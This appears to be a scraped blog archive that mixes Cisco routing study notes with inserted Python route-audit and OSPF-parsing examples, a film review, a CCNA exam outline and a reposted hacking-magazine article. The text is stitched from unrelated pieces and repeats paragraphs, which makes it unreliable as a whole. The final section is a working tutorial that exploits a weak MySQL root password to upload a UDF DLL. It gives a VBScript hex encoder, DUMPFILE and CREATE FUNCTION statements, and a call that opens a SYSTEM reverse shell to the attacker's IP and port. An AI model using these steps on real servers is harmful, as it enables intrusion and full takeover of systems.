Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#
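
A configuration-drift check built on the output above, as an added example that is not part of the Cisco document: it reads the "Gateway of last resort" line and the routes flagged with `*`, then compares them with what the operator expects. The function names and the policy of allowing only static (`S`) candidates are assumptions.

```python
import re

# Output copied from the router-3 session above.
SHOW_IP_ROUTE = """\
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
"""

GOLR_RE = re.compile(
    r"Gateway of last resort is (?:not set|(\S+) to network (\S+))")
# A candidate default carries '*' directly after its source code ("S*", "R*").
CANDIDATE_RE = re.compile(
    r"^\s*([A-Za-z]+)\*(\S*)\s+(\S+)(?: \[(\d+)/(\d+)\])?(?: via ([\d.]+))?",
    re.M)


def parse_default_route(text):
    """Extract the gateway of last resort and every candidate default route."""
    m = GOLR_RE.search(text)
    if m is None:
        raise ValueError("no 'Gateway of last resort' line found")
    candidates = [
        {"source": c.group(1) + c.group(2),
         "prefix": c.group(3),
         "distance": int(c.group(4)) if c.group(4) else None,
         "next_hop": c.group(6)}
        for c in CANDIDATE_RE.finditer(text)
    ]
    return {"gateway": m.group(1), "network": m.group(2),
            "candidates": candidates}


def audit(text, expected_gateway, allowed_sources=("S",)):
    """Return findings when the default route differs from the expected one."""
    info = parse_default_route(text)
    findings = []
    if info["gateway"] is None:
        findings.append("gateway of last resort is not set")
    elif info["gateway"] != expected_gateway:
        findings.append("gateway of last resort is %s, expected %s"
                        % (info["gateway"], expected_gateway))
    for c in info["candidates"]:
        if c["source"] not in allowed_sources:
            findings.append("candidate default %s learned from source %s"
                            % (c["prefix"], c["source"]))
    return findings


if __name__ == "__main__":
    print(parse_default_route(SHOW_IP_ROUTE))
    print(audit(SHOW_IP_ROUTE, "170.170.3.4"))
```
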

R1

route1(config)#router rip

route1(config-router)#network 192.168.1.0

route1(config-router)#network 192.168.101.0

R2

route1(config)#router rip

route1(config-router)#network 192.168.1.0

route1(config-router)#network 192.168.100.0

Tips: The rest is the same as lab5.

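July 21, 2005

Chapter 1: Routing Principles
1.1 Routing Fundamentals
Routing is the relay process of forwarding an object from one place to another.
The mechanism for learning and maintaining knowledge of the network topology is considered the routing function. Moving transit traffic that enters a router interface through the router to an outbound interface is a separate function, considered the switching/forwarding function. A routing device must perform both routing and switching to be an effective relay device.
To route, a router must know the following three things:
- The router must determine whether support for the protocol suite is enabled;
- The router must know the destination network;
- The router must know which outbound interface is the best path to the destination.

Routing protocols use metrics to determine the best path to a destination. A smaller metric indicates a preferred path; if two or more paths share the same lowest metric, all of them are used equally. Distributing traffic across multiple paths is called load balancing to the destination.

The information needed to perform routing operations is held in the router's routing table, which is generated by one or more routing protocol processes. The routing table consists of route entries, each of which indicates the following:
- The mechanism by which the route was learned (dynamic or manual)
- The logical destination
- The administrative distance
- The metric (a measure of the total "cost" of a path)
- The address of the next-hop relay device (router) toward the destination;
- How recent the routing information is
- The interface associated with the destination network
Use the SHOW IP ROUTE command to see the items above.

Default administrative distances are assigned on this principle: manually configured route entries take priority over dynamically learned ones, and routing protocols with more sophisticated metric algorithms take priority over those with simpler ones.

A router normally chooses the path with the lowest metric. In an IP environment on a Cisco router, if several paths share the same lowest metric, load balancing is enabled across them. Cisco supports 4 equal-metric paths by default; the "maximum-paths" command lets a Cisco router support up to 6 equal-metric paths.

RIP is a routing protocol used in small to medium-sized TCP/IP networks. It uses hop count as its metric, and its load balancing is enabled by default. RIP does not consider bandwidth when choosing the best path!!!
IGRP is a routing protocol used in medium to large TCP/IP networks. It uses a composite metric that takes into account bandwidth, delay, reliability, load and maximum transmission unit (MTU), but by default only bandwidth and delay are used. IGRP can also load balance.
As soon as a router starts, it tries to establish routing relationships with its neighboring routing devices. The purpose of this initial communication is to identify the neighbors and to begin communicating and learning the network topology. How neighbor relationships are established and how the topology is initially learned differ from one routing protocol to another.
Routing protocols exchange periodic Hello messages or periodic routing update packets to keep communication going between neighboring devices.
Once the network topology is understood and the routing table contains the best paths to the known networks, forwarding data to those destinations can begin ;)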

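1.2 Routing Protocols

Overview of classful routing
Routing protocols that do not send subnet mask information with each network address are called classful routing protocols (RIPv1, IGRP).
With a classful routing protocol, all subnets of the same major network (Class A, B or C) must use the same subnet mask. A router running a classful routing protocol does one of the following to determine the network portion of a route:
- If the routing update is about the same major network as the one configured on the receiving interface, the router applies the subnet mask configured on that interface;
- If the routing update is about a different major network from the one configured on the receiving interface, the router applies the default subnet mask for the address class.

Classful summary routes are generated automatically by classful routing protocols.

Overview of classless routing
Classless routing protocols include Open Shortest Path First (OSPF), EIGRP, RIPv2, Intermediate System-to-Intermediate System (IS-IS) and Border Gateway Protocol version 4 (BGP4).
Using different mask lengths within the same major network is called variable-length subnet masking (VLSM). Classless routing protocols support VLSM, so subnet masks can be set more efficiently to match the number of hosts each subnet needs, making fuller use of host addresses.

Most distance-vector routing protocols generate periodic, routine routing updates that are sent only to directly connected routing devices.

In a pure distance-vector environment, a routing update contains a complete routing table. By receiving a neighbor's full routing table, a router can check all known routes and then modify its local routing table according to the update. The distance-vector approach to routing is sometimes called "routing by rumor".

Cisco IOS supports several distance-vector routing protocols, including RIPv1, RIPv2 and IGRP. Cisco also supports EIGRP, an advanced distance-vector routing protocol.

Routing protocols are usually associated with the network layer of a protocol suite.

Most distance-vector routing protocols use the Bellman-Ford algorithm to compute routes. EIGRP is an advanced distance-vector routing protocol that uses the Diffusing Update Algorithm (DUAL).

Comparison of Cisco IP distance-vector routing protocols
Feature: RIPv1 / RIPv2 / IGRP / EIGRP
Count to infinity: X X X
Split horizon: X X X X
Hold-down timers: X X X
Triggered updates, poison reverse: X X X X
Load balancing, equal-cost paths: X X X X
Load balancing, unequal-cost paths: X X
VLSM support: X X
Routing algorithm: Bellman-Ford / Bellman-Ford / Bellman-Ford / DUAL
Metric: hop count / hop count / composite / composite
Hop count limit: 15 / 15 / 100 / 100
Scalability: small / small / medium / large
Note: The hop count limit of IGRP and EIGRP defaults to 100 but can be configured up to a maximum of 255.

Link-state routing protocols generate routing update packets only when the network topology changes. When the state of a link changes, the device that detects the change generates a link-state advertisement (LSA) about that link (route). The LSA is then propagated to all neighboring devices through a special multicast address. Every routing device keeps a copy of the LSA, forwards it to its neighbors (this process is called flooding), and then updates its topology database (a table holding the state of every link in the network). LSA flooding ensures that all routing devices learn of the change, so that they can update their databases and generate an updated routing table that reflects the new network topology.
Comparison of Cisco link-state routing protocols
Feature: OSPF / IS-IS / EIGRP
Requires a hierarchical topology: X X
Retains knowledge of all possible routes: X X X
Route summarization, manual: X X X
Route summarization, automatic: X
Event-triggered advertisements: X X X
Load balancing, equal-cost paths: X X X
Load balancing, unequal-cost paths: X
VLSM support: X X X
Routing algorithm: Dijkstra / IS-IS / DUAL
Metric: link cost (bandwidth) / link cost (bandwidth) / composite
Hop count limit: none / 1024 / 100
Scalability: large / very large / large
The routing process in each router must keep a single loop-free path to every possible destination logical network. When all routing tables are synchronized and each contains a usable route to every destination network, the network has converged. Convergence is the activity associated with synchronizing routing tables after the network topology changes, for example when a new route is added or the state of an existing route changes.
Convergence time is the time it takes for all routers in the network to agree on the current topology. The size of the network, the routing protocol in use and numerous configurable timers all affect convergence time.

There are two detection methods:
- When the physical or data link layer fails to receive a certain number (usually 3) of consecutive keepalive messages, the link is considered down.
- When the routing protocol fails to receive a certain number (usually 3) of consecutive Hello messages, routing updates or similar messages, the link is considered down.

Most routing protocols have timers that prevent topology loops from forming while link states are in transition.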

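Chapter 2: Extending IP Addresses
The Internet has grown unbelievably fast. This rapid growth has created two major addressing challenges:
- Exhaustion of IP addresses
- Growth and manageability of routing tables

IP addressing solutions:
Slow the consumption of IP addresses and reduce the number of Internet routing table entries by enabling more hierarchical layers in IP addresses. These solutions include:
- Subnet masks
- Address allocation for private networks
- Network address translation (NAT)
- Hierarchical addressing
- Variable-length subnet masks (VLSM)
- Route summarization
- Classless interdomain routing (CIDR)

IP address classes:
First octet of the address (decimal): address class
1~126: Class A
128~191: Class B
192~223: Class C
224~239: Class D
240~255: Class E
Class D addresses are not yet widely used; they are multicast addresses. Class D multicast addresses used by some routing protocols:
OSPF: 224.0.0.5 and 224.0.0.6
RIPv2: 224.0.0.9
EIGRP: 224.0.0.10

Hierarchical addressing:
Hierarchical addressing is much like making a phone call. No telephone exchange needs to know every phone number in the country. If the first digit you dial is not 0, the exchange finds the line among its own entries and connects the call. If it is 0, the exchange looks at the area code: for 0791-6221155, for example, it passes the call to the Nanchang exchange (0791), which finds the line for 6221155 and connects it. The local exchange therefore does not need to hold entries for other regions (let the others earn their keep too :)). The same principle can be applied in routers.

Advantages of hierarchical addressing:
- Fewer routing entries
Route summarization is a way of using one IP address to represent a set of IP addresses once a hierarchical addressing plan is in place. Summarizing routes keeps routing table entries manageable and brings the following benefits:
  - Better routing (forwarding) efficiency;
  - Fewer CPU cycles needed when recalculating the routing table or searching its entries for a match;
  - Lower memory requirements on the router
  - Faster convergence when the network changes
  - Easier troubleshooting
- Efficient address allocation
Hierarchical addressing lets us use all possible addresses, because our address groups are contiguous;

Variable-length subnet masks (VLSM)
VLSM provides the ability to have more than one subnet mask within a major (Class A, B or C) network, and to subnet a subnet further. Its advantages are:
- More efficient use of IP addresses: without VLSM, a company is limited to a single subnet mask within one Class A, B or C network number;
- Greater ability to use route summarization: VLSM allows more hierarchical levels in the addressing plan, so routes can be summarized better in the routing table.

Route summarization
Large internetworks contain hundreds or thousands of networks. In such an environment it is generally undesirable for routers to keep all of these routes in their routing tables. Route summarization (also called route aggregation or supernetting) reduces the number of route entries a router must keep, because it is a way of representing a series of network numbers with a single summary address.

Another advantage of route summarization in large, complex networks is that it shields other routers from the effects of topology changes.

Route summarization is feasible and most effective only when a proper addressing plan is used. In a subnetted environment, summarization is most effective when the network addresses are contiguous blocks whose size is a power of 2.

Routing protocols summarize or aggregate routes based on the shared portion of the network address. The classless routing protocols, OSPF and EIGRP, support route summarization based on subnet addresses, including VLSM addressing. The classful routing protocols, RIPv1 and IGRP, summarize routes automatically at classful network boundaries. Classful routing protocols do not support summarization at any other bit boundary, whereas classless routing protocols support summarization at any bit boundary.
Because there are fewer routing table entries, route summarization reduces router memory use and the network traffic generated by routing protocols. For route summarization to work correctly in a network, the following requirements must be met:
- The multiple IP addresses must share the same high-order bits;
- Routing protocols must make forwarding decisions based on a 32-bit IP address and a prefix length of up to 32 bits
- Routing updates must carry the prefix length (subnet mask) together with the 32-bit IP address.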
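
The "shared high-order bits" requirement worked through in code, as an added example that is not part of the original notes: it derives the shortest summary prefix for a set of subnets and lists any address space the summary would advertise that none of the inputs covers. The function name and the sample 172.16.x.0/24 subnets are assumptions.

```python
import ipaddress


def summarize(prefixes):
    """Return (summary, gaps): the shortest single prefix that covers every
    input network, and the parts of it that no input network accounts for."""
    nets = list(ipaddress.collapse_addresses(
        ipaddress.ip_network(p) for p in prefixes))
    lo = min(int(n.network_address) for n in nets)
    hi = max(int(n.broadcast_address) for n in nets)
    # Bits in which the lowest and highest address differ cannot belong to
    # the shared prefix; everything above the highest differing bit is common.
    prefix_len = 32 - (lo ^ hi).bit_length()
    base = (lo >> (32 - prefix_len)) << (32 - prefix_len)
    summary = ipaddress.ip_network((base, prefix_len))

    # Subtract every input from the summary; what is left is advertised by
    # the summary but not actually present behind this router.
    remaining = [summary]
    for n in nets:
        nxt = []
        for r in remaining:
            if n.subnet_of(r):
                nxt.extend(r.address_exclude(n))
            elif not r.subnet_of(n):
                nxt.append(r)
        remaining = nxt
    return summary, sorted(remaining)


if __name__ == "__main__":
    # Eight contiguous /24s form a power-of-2 block: an exact /21 summary.
    full = ["172.16.%d.0/24" % i for i in range(168, 176)]
    print(summarize(full))
    # Three /24s are not a power-of-2 block: the /22 also claims 172.16.171.0/24.
    print(summarize(full[:3]))
```

A non-empty gap list means the summary attracts traffic for addresses that do not exist behind the router, which is why the notes insist on contiguous power-of-2 blocks.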

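Route summarization operation in Cisco routers
Cisco manages route summarization in two ways:
- Sending route summaries
- Selecting routes from route summaries

Discontiguous subnets are subnets of the same major network that are separated by a different major network.

Route summarization support by routing protocol
Protocol: Summarizes automatically at classful network boundaries? / Can automatic summarization be turned off? / Can it summarize at boundaries other than the classful network boundary?
RIPv1: yes / no / no
RIPv2: yes / yes / no
IGRP: yes / no
EIGRP: yes / yes / yes
OSPF: no / – / yes


Classless interdomain routing (CIDR)

CIDR is a technique developed to help slow the growth of IP address consumption and routing tables. The idea behind CIDR is that multiple Class C address blocks can be combined, or aggregated, into a larger classless set of IP addresses (that is, allowing more hosts). Blocks of Class C addresses are allocated to individual ISPs.


Using unnumbered IP addresses on serial interfaces
To enable IP processing on a serial interface without assigning it an explicit IP address, use the "ip unnumbered type number" interface configuration command. In this command, "type number" is the type and number of another interface on the router that has an IP address assigned (called the specified or reference interface, that is, the interface from which the unnumbered interface borrows its IP address). It cannot be another unnumbered interface. To turn off IP processing on the serial interface, use the no form of the command.

Restrictions on unnumbered interfaces:
- Serial interfaces using HDLC, PPP, LAPB or SLIP, and tunnel interfaces, can be unnumbered. The unnumbered interface configuration command cannot be used on X.25 or Switched Multimegabit Data Service (SMDS) interfaces.
- We cannot use the ping command to determine whether an unnumbered interface is up, because the interface has no address. SNMP can be used to monitor the interface status remotely.
Example:
interface Ethernet0
 ip address 10.1.1.1 255.255.255.0
!
interface Serial0
 ip unnumbered Ethernet0


Using a helper address

Routers do not forward broadcasts. A helper address helps clients and servers make contact by forwarding these broadcast packets directly to the target server.

The helper address command changes the broadcast destination address to a unicast address (or a directed broadcast, that is, a local broadcast within a particular subnet), so that the broadcast message can be routed to one specific destination instead of everywhere.

Use the "ip helper-address address" interface configuration command on an interface that may receive broadcasts. In this command, "address" is the destination address to use when forwarding User Datagram Protocol (UDP) broadcasts. The address can be the unicast address of a remote server or a directed broadcast address.

When the "ip helper-address address" command is defined, forwarding is automatically enabled for 8 default UDP ports: TFTP (69), DNS (53), Time (37), NetBIOS name service (137), NetBIOS datagram service (138), BOOTP server (67), BOOTP client (68) and Terminal Access Controller Access Control System, TACACS (49).
If the "ip helper-address address" command is defined together with "ip forward-protocol udp" commands specifying these 8 UDP ports, broadcast packets addressed to these 8 UDP ports are forwarded automatically.

"ip forward-protocol" description:
"ip forward-protocol" keyword: description
udp: UDP, the transport-layer protocol
port: (Optional) When the "udp" keyword is specified, a UDP destination port number or port name can be given
nd: Network Disk; an old protocol used by diskless Sun workstations
sdns: Network security protocol

Example:
interface Ethernet 0
 ip address 172.16.1.100 255.255.255.0
 ip helper-address 172.16.2.2
!
ip forward-protocol udp 3000
no ip forward-protocol udp tftp

The "ip helper-address" command must be configured on the router interface that receives the client's original broadcast packet.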

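Chapter 3: Configuring OSPF in a Single Area
OSPF is a link-state technology, as opposed to distance-vector technologies such as the Routing Information Protocol (RIP). The OSPF protocol performs the two main functions of every routing protocol algorithm: path selection and path switching.

OSPF is an interior gateway protocol (IGP); that is, it distributes routing information between routers belonging to the same autonomous system.

OSPF was written to meet the needs of large, scalable networks that RIP could not. OSPF addresses the following issues:
- Speed of convergence
- Support for variable-length subnet masks (VLSM)
OSPF and RIPv2 support VLSM; RIP supports only fixed-length subnet masks (FLSM)
- Network reachability
RIP treats a span of 16 hops as unreachable; OSPF in theory has no reachability limit
- Bandwidth use
RIP broadcasts its complete routing table every 30 seconds; OSPF sends updates only when a link changes
- Path selection method
RIP chooses the best path by hop count; OSPF uses a path cost value (on Cisco routers, based on connection speed) as the basis for path selection. Like RIP and IGRP, OSPF supports equal-cost paths

OSPF information is carried inside IP packets, using protocol number 89
OSPF can run on broadcast or nonbroadcast networks


OSPF operation in a broadcast multiaccess topology

The Hello protocol is responsible for establishing and maintaining neighbor relationships
Hello packets are sent periodically out of every interface participating in OSPF, using IP multicast 224.0.0.5, also known as the ALLSPFROUTER (all SPF routers) address.

A Hello packet contains the following information:
- Router ID
This 32-bit number uniquely identifies a router within an autonomous system. By default it is the highest IP address on an active interface. The identifier is important when establishing neighbor relationships and when coordinating messages between the copies of the SPF algorithm running in the network.
- Hello interval and dead interval
The Hello interval specifies how often (in seconds) a router sends Hellos. The dead interval is the time, in seconds, that a router waits to hear from a neighbor before declaring it down; by default it is 4 times the Hello interval.
- Neighbors
These are the neighboring routers with which bidirectional communication has been established
- Area ID
To communicate, two routers must share a common network segment
- Router priority
This 8-bit number indicates the router's priority when the DR and BDR are selected.
- IP addresses of the DR and BDR
- Authentication password
- Stub area flag


Fields in the OSPF packet header:
- Version number: 1 (bytes)
- Type: 1
Hello
Link-state request
Link-state update
Link-state acknowledgment
- Packet length: 2
- Router ID: 4
- Area ID: 4
- Checksum: 2
- Authentication type: 2
- Authentication: 8
- Data: variable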
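
The header layout above as a parser, written as an added example rather than code from the original notes: it unpacks the 24 fixed bytes, verifies the checksum and reports how the packet is authenticated. The type and authentication-type numbers come from RFC 2328 (which also defines type 2, Database Description, missing from the list above); the function names and the sample Hello packet are constructed for illustration.

```python
import ipaddress
import struct

HEADER = struct.Struct("!BBH4s4sHH8s")   # 1+1+2+4+4+2+2+8 = 24 bytes
PACKET_TYPES = {1: "Hello", 2: "Database Description", 3: "Link State Request",
                4: "Link State Update", 5: "Link State Acknowledgment"}
AUTH_TYPES = {0: "null", 1: "simple password", 2: "cryptographic"}


def inet_checksum(data):
    """16-bit one's-complement checksum, as used by IP and OSPF."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_ospf_header(packet):
    if len(packet) < HEADER.size:
        raise ValueError("truncated OSPF header")
    ver, ptype, length, rid, area, cksum, autype, auth = HEADER.unpack_from(packet)
    # The checksum covers the whole packet except the 8-byte authentication
    # field; the checksum field itself counts as zero.
    covered = packet[:12] + b"\x00\x00" + packet[14:16] + packet[24:length]
    return {
        "version": ver,
        "type": PACKET_TYPES.get(ptype, "unknown (%d)" % ptype),
        "length": length,
        "length_ok": HEADER.size <= length <= len(packet),
        "router_id": str(ipaddress.IPv4Address(rid)),
        "area_id": str(ipaddress.IPv4Address(area)),
        "auth_type": AUTH_TYPES.get(autype, "unknown (%d)" % autype),
        "auth_data": auth,
        "checksum_ok": inet_checksum(covered) == cksum,
    }


def review(hdr):
    """Return the points a defender would note about this packet."""
    findings = []
    if hdr["version"] != 2:
        findings.append("unexpected OSPF version %d" % hdr["version"])
    if not hdr["length_ok"]:
        findings.append("packet length field does not fit the captured data")
    if hdr["auth_type"] == "null":
        findings.append("null authentication: the sender is not verified")
    elif hdr["auth_type"] == "simple password":
        findings.append("simple password: the key crosses the wire in cleartext")
    # With cryptographic authentication the checksum field is not used.
    if hdr["auth_type"] != "cryptographic" and not hdr["checksum_ok"]:
        findings.append("checksum mismatch")
    return findings


def build_sample_hello(autype=0, auth=b"\x00" * 8):
    """Constructed Hello (not a capture): router 10.1.1.1, area 0.0.0.0,
    Hello interval 10 s and dead interval 40 s (4 times the Hello interval)."""
    rid = ipaddress.IPv4Address("10.1.1.1").packed
    area = ipaddress.IPv4Address("0.0.0.0").packed
    body = struct.pack("!4sHBBI4s4s",
                       ipaddress.IPv4Address("255.255.255.0").packed,
                       10, 0x02, 1, 40, rid, area)
    length = HEADER.size + len(body)
    head = HEADER.pack(2, 1, length, rid, area, 0, autype, b"\x00" * 8)
    cksum = inet_checksum(head[:16] + body)
    return HEADER.pack(2, 1, length, rid, area, cksum, autype, auth) + body


if __name__ == "__main__":
    hdr = parse_ospf_header(build_sample_hello())
    print(hdr)
    print(review(hdr))
```
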


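Designated router (DR) and backup designated router (BDR)
Routers in a multiaccess environment such as an Ethernet segment must elect a DR and a BDR to represent the network. While the DR is running, the BDR performs no DR functions. It receives all the information but does not process it; the DR handles forwarding and synchronization. The BDR takes over the DR's work only when the DR fails.

Value of the DR and BDR:
- Reduced routing update traffic
The DR and BDR act as a central point for the exchange of link-state information on a given multiaccess network. Every router must establish an adjacency with the DR and the BDR, and the DR sends each router's link-state information to all the other routers on the multiaccess network. This flooding process greatly reduces router-related traffic on the network segment.
- Managed link-state synchronization
The DR and BDR ensure that the other routers on the network all have the same link-state information about the network
An adjacency is the relationship between a router and its DR and BDR. Adjacent routers have synchronized link-state databases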
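July 20, 2005

        It is quite an old film, but back then I only read the synopsis and felt nothing much, and afterwards I never had the chance to watch it. Today I finally got to see it.

        When the film ended I found, to my great surprise, that my eyes were a little wet. It seems a long time since anything moved me. The film is really just a simple story of love between a human and a divine being. If it had been made in China it would have become the Dragon Princess, the Cowherd and the Weaver Girl, or the Seven Fairies; in Andersen's fairy tales it might be the story of the mermaid and the prince. Yet those stories hardly move me, even though they all end tragically and are all about love across a distance. Why do I say so?

       I do not know how to describe what I felt, but I know I was touched by the extremely strong sense of responsibility Maggie shows at the start of the film; I was moved by Seth, who, whatever Maggie's past or even present, was willing to pay the price of eternal life to pursue that momentary love; and I was inspired by Seth bravely facing a new life at the end, after bearing the pain of losing his beloved.

       What touched me, moved me and inspired me is all so real, and yet seems so far away from me. It seems I have never had these things, or perhaps I have kept them sealed away all along? Whatever it is, I think I no longer need to look for that answer.

       I seem to have found my own direction. No, not "seem": I really have found my own direction.

       Finally, I think I should thank Nicolas Cage, Meg Ryan and Brad Silberling!
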

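◆ Exam time: 90 minutes.

  ◆ Number of questions: 56.

  ◆ Question types: 3 router simulation questions; a few drag-and-drop matching questions; mostly multiple-choice and other question types.

  ◆ Exam content: Planning & Designing, Implementation & Operation, Troubleshooting and Technology, that is: network design and planning, network implementation, network troubleshooting, and key network technologies.

  1. Planning & Designing:
           Build a simple network using Cisco network technology
           Plan an IP addressing scheme and analyze design requirements
           Select an appropriate routing protocol based on user requirements
           Build a simple access network using Cisco network technology
           Configure appropriate access control lists based on user requirements
           Select appropriate WAN services based on user requirements

  2. Implementation & Operation:
           Configure an appropriate routing protocol according to user requirements
           Configure IP addresses, subnet masks and gateway addresses on routers and hosts
           Configure a router's additional management functions
           Configure VLANs and interswitch communication on switches
           Implement a LAN
           Configure a switch in a given network environment
           Manage operating system and device configuration files
           Perform initial router configuration
           Perform initial switch configuration
           Implement access control lists
           Implement simple WAN protocols

  3. Troubleshooting:
           Use knowledge of the OSI 7-layer model to guide network troubleshooting
           Troubleshoot LANs and VLANs
           Resolve routing protocol problems
           Resolve IP addressing and host configuration problems
           Resolve faults in devices on a running network
           Resolve faults caused by access control lists
           Perform simple WAN troubleshooting

  4. Technology:
           Describe network communication using the OSI layered model
           Describe the operation of the Spanning Tree Protocol
           Compare and contrast the main characteristics of various LAN environments
           Evaluate the characteristics of routing protocols
           Evaluate the TCP/IP communication process and its associated protocols
           Describe the characteristics of network device components
           Evaluate the characteristics of network device components
           Evaluate the rules of packet handling
           Evaluate key characteristics of WANs

  According to the head of Cisco's Internet Learning Solutions Group, the newly released CCNA 640-801 exam adds CCNP topics, including OSPF, EIGRP, variable-length subnet masking and advanced switching technology configuration. The upgraded exam does not narrow the scope; it is considerably broader and deeper than 640-607.
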

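July 19, 2005

This article was published in the July issue of 《黑客X档案》 (Hacker X Files). Author: dugu

Tutorials on getting a webshell through a weak MySQL password have been on the net for a long time, but this time I am not talking about getting a webshell: I mean getting system privileges directly. Read that carefully: "directly"!

First, a brief outline of how a weak MySQL password leads to system privileges: use a MySQL script to upload a UDF DLL file, then register the self-written function in the UDF DLL and use it to execute arbitrary commands.

The idea is simple and there are some tutorials online, but they either give no concrete code or gloss over it in one sentence, which makes it hard for a beginner like me to follow. After several days of hard, repeated testing I finally got some results, and I am handing the detailed process and the related code over to everyone, so that you can write your own DLL files and generate the binary encoding of different files yourselves!

First, how to generate the upload script for a binary file. Look at this MySQL script (the method used by the netizen Mix):

set @a = concat('',0x0123abc1312389…..);

set @a = concat(@a,0x4658978abc545e……);

………………….

create table Mix(data LONGBLOB);//create table Mix with a column named data of type longblob

insert into Mix values("");update Mix set data = @a;//insert @a into table Mix

select data from Mix into DUMPFILE 'C:\\Winnt\\filename';//export the table contents to a file

The first two statements should look familiar: this is the bypass workaround we used in earlier injection work, declaring the code's hexadecimal value in a variable and then loading that variable. Here, though, the hex is the content of a whole file and far too long, so the concat function is used to keep appending to the previous value, accumulating everything into one variable, a. The later statements are simple, and I have commented them all.

The last three statements are easy, but producing that much hex data by hand would be exhausting! Remember the old exe2bat.vbs script? This time we can modify it to produce the MySQL script we need. Comparing the file generated by exe2bat.vbs with the script format we need, we can easily arrive at the script we want. It reads as follows: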

fp=wscript.arguments(0)

fn=right(fp,len(fp)-instrrev(fp,"\"))

with createobject("adodb.stream")

.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)

end with

sll=sl mod 65536:slh=sl\65536

with createobject("scripting.filesystemobject").opentextfile(fp&".txt",2,true)

.write "set @a = concat('',0x"

for i=1 to sl

bt=ascb(midb(str,i,1))

if bt<16 then .write "0"

.write hex(bt)

if i mod 128=0 then .write ");"+vbcrlf+"set @a = concat(@a,0x"

next

end with

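Now, just drag the file you want to upload onto the script's icon and a .txt file of the same name is generated. This .txt file is the MySQL script we need, although it still has to be edited (we did cut corners to get it, after all!): delete the superfluous "set @a = concat('',0x" generated on the last line, and add the three statements for creating the table and inserting the value.

The script is generated; how do we upload it? First log in to the MySQL server:

C:\>mysql -u root -h hostip -p

Mysql>use mysql; //enter MySQL's default database first, otherwise the table created in the next step will not belong to any database

Mysql>\. E:\*.dll.txt; //this is the MySQL script you generated

Enter the commands as above and you will see text flashing rapidly across the screen (provided the connection is fast); before long your file has been uploaded!

Now to the main point: which DLL file do we upload? So far I have seen two ready-made DLL files online, mix.dll written by Mix and my_udf.dll written by envymask. I have used both; both are good, but each has some shortcomings. Let's look at how they are used!

First, mix.dll:

Log in to MySQL and enter the commands:

Mysql> \. e:\mix.dll.txt;

Mysql> CREATE FUNCTION Mixconnect RETURNS STRING SONAME 'C:\\windows\\mix.dll';

//Mixconnect registered here is the function implemented in our DLL file; we will use it to execute system commands!

Mysql> select Mixconnect('your ip','8080'); //fill in your reverse-connection IP and port

After a while, the nc listening on port 8080 gets a shell with system privileges! See Figure 1.

This really is good: the shell obtained by connecting back can get through some firewalls. Unfortunately the function is not well written and can only be executed once. When you connect to the database a second time and run "select Mixconnect('your ip','8080');" again, the remote MySQL crashes! It reports an error and the service stops! See Figure 2.

So with mix.dll you succeed only once, with no second chance! Also, according to my tests, it does not seem to work on Win2003 systems.

Next, my_udf.dll:

Mysql>\. C:\my_udf.dll.txt

Mysql> CREATE FUNCTION my_udfdoor RETURNS STRING SONAME 'C:\\winnt\\my_udf.dll';

    //likewise, my_udfdoor is the function we use to execute system commands once it is registered

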